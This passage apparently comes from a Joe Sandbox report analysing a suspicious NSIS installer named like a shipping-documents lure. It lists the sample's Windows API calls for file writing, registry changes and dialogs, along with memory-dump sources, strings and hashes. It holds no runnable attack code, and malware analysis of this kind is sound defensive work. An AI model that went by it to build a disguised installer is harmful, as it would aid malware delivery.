                                                • lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                • lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                • lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
                                                • SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID:
                                                • API String ID: 2531174081-0
                                                • Opcode ID: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
                                                • Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
                                                • Opcode Fuzzy Hash: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
                                                • Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8
                                                APIs
                                                • DestroyWindow.USER32(?,00000000), ref: 00402D33
                                                • GetTickCount.KERNEL32 ref: 00402D51
                                                • wsprintfW.USER32 ref: 00402D7F
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                  • Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
                                                  • Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                • CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
                                                • ShowWindow.USER32(00000000,00000005), ref: 00402DB1
                                                  • Part of subcall function 00402CFC: MulDiv.KERNEL32(?,00000064,?), ref: 00402D11
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                • String ID: ... %d%%
                                                • API String ID: 722711167-2449383134
                                                • Opcode ID: 201e492ae77eb6b4c8df967ba73cc99fc00f9962e74671e1787f0dc67121c729
                                                • Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
                                                • Opcode Fuzzy Hash: 201e492ae77eb6b4c8df967ba73cc99fc00f9962e74671e1787f0dc67121c729
                                                • Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
                                                • GetMessagePos.USER32 ref: 00404A7F
                                                • ScreenToClient.USER32(?,?), ref: 00404A99
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                • Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
                                                • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                • Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5
                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9B
                                                • wsprintfW.USER32 ref: 00402CCF
                                                • SetWindowTextW.USER32(?,?), ref: 00402CDF
                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                • API String ID: 1451636040-1158693248
                                                • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                • Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
                                                • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                • Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                                • API String ID: 0-981061697
                                                • Opcode ID: 05f6144dd89fa135ddecc204df5df5de80e04669b0366af716678e18a3bc697d
                                                • Instruction ID: fa21b80fb9f5bcf3e6b315ff43b4677db3ef40b68a881396f16d2f1ca939a3b9
                                                • Opcode Fuzzy Hash: 05f6144dd89fa135ddecc204df5df5de80e04669b0366af716678e18a3bc697d
                                                • Instruction Fuzzy Hash: ECF13034B00208CFDB19EFA5C954A5EBBB7BF88340F608529D815AB769DB34EC46CB44
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00403190
                                                  • Part of subcall function 0040330D: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                                                • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
                                                • WriteFile.KERNEL32(0040BE78,?,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: File$Pointer$CountTickWrite
                                                • String ID: x>A
                                                • API String ID: 2146148272-3854404225
                                                • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                • Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
                                                • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                • Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED
                                                APIs
                                                • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403330,00436800,75923420,00403510), ref: 004061DF
                                                • CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403330,00436800,75923420,00403510), ref: 004061F3
                                                • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403330,00436800,75923420,00403510), ref: 00406206
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: *?|<>/":
                                                • API String ID: 589700163-165019052
                                                • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                • Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
                                                • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                • Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 0040252D
                                                • lstrlenA.KERNEL32(00409D80,?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 00402534
                                                • WriteFile.KERNEL32(00000000,?,00409D80,00000000,?,?,00000000,00000011), ref: 00402566
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: ByteCharFileMultiWideWritelstrlen
                                                • String ID: 8
                                                • API String ID: 1453599865-4194326291
                                                • Opcode ID: eb4f0eac3f684fb2a63f37bc1092f8bc6a44a302634324d4ca23fee1544f7428
                                                • Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
                                                • Opcode Fuzzy Hash: eb4f0eac3f684fb2a63f37bc1092f8bc6a44a302634324d4ca23fee1544f7428
                                                • Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E
                                                APIs
                                                • lstrcatW.KERNEL32(00000000,00000000,00409580,00435000,?,?,00000031), ref: 00401793
                                                • CompareFileTime.KERNEL32(-00000014,?,00409580,00409580,00000000,00000000,00409580,00435000,?,?,00000031), ref: 004017B8
                                                  • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                  • Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
                                                  • Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID:
                                                • API String ID: 1941528284-0
                                                • Opcode ID: f85250a5a9e88103d3d651ef37910dcedbb4e657076cd08a1369e1982fdbe284
                                                • Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
                                                • Opcode Fuzzy Hash: f85250a5a9e88103d3d651ef37910dcedbb4e657076cd08a1369e1982fdbe284
                                                • Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B99
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
                                                • RegCloseKey.ADVAPI32(?), ref: 00402BDE
                                                • RegCloseKey.ADVAPI32(?), ref: 00402C03
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Close$DeleteEnumOpen
                                                • String ID:
                                                • API String ID: 1912718029-0
                                                • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                • Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
                                                • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                • Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69
                                                APIs
                                                • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                • DeleteObject.GDI32(00000000), ref: 00401D36
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: ebee129f8a245dc929862c077a7183d7f7680bcc51d1a04b4969c9551adf2949
                                                • Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
                                                • Opcode Fuzzy Hash: ebee129f8a245dc929862c077a7183d7f7680bcc51d1a04b4969c9551adf2949
                                                • Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39
                                                APIs
                                                • GetDC.USER32(?), ref: 00401D44
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                • String ID:
                                                • API String ID: 3808545654-0
                                                • Opcode ID: 5126b5a6483c23ca9b923fe170de86e7b0dfb2dc664948fdd2ce29f1bdd8c223
                                                • Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
                                                • Opcode Fuzzy Hash: 5126b5a6483c23ca9b923fe170de86e7b0dfb2dc664948fdd2ce29f1bdd8c223
                                                • Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E
                                                APIs
                                                • SetFilePointer.KERNEL32(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
                                                • WriteFile.KERNEL32(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: File$PointerWrite
                                                • String ID: x>A
                                                • API String ID: 539440098-3854404225
                                                • Opcode ID: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
                                                • Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
                                                • Opcode Fuzzy Hash: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
                                                • Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9
                                                APIs
                                                • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
                                                • wsprintfW.USER32 ref: 00404A10
                                                • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
                                                • Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
                                                • Opcode Fuzzy Hash: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
                                                • Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC
                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                                                • Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
                                                • Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                                                • Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19
                                                APIs
                                                • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                                                • lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                                                • RegSetValueExW.ADVAPI32(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                                                • RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: CloseCreateValuelstrlen
                                                • String ID:
                                                • API String ID: 1356686001-0
                                                • Opcode ID: d61713cf9ddd3f610e149d83436bff4682ee40a9bf76952b8ac674dc90b080fe
                                                • Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
                                                • Opcode Fuzzy Hash: d61713cf9ddd3f610e149d83436bff4682ee40a9bf76952b8ac674dc90b080fe
                                                • Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69
                                                APIs
                                                  • Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,00436800,?,75922EE0,00405790,?,00436800,75922EE0,00434000), ref: 004059EC
                                                  • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
                                                  • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09
                                                • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
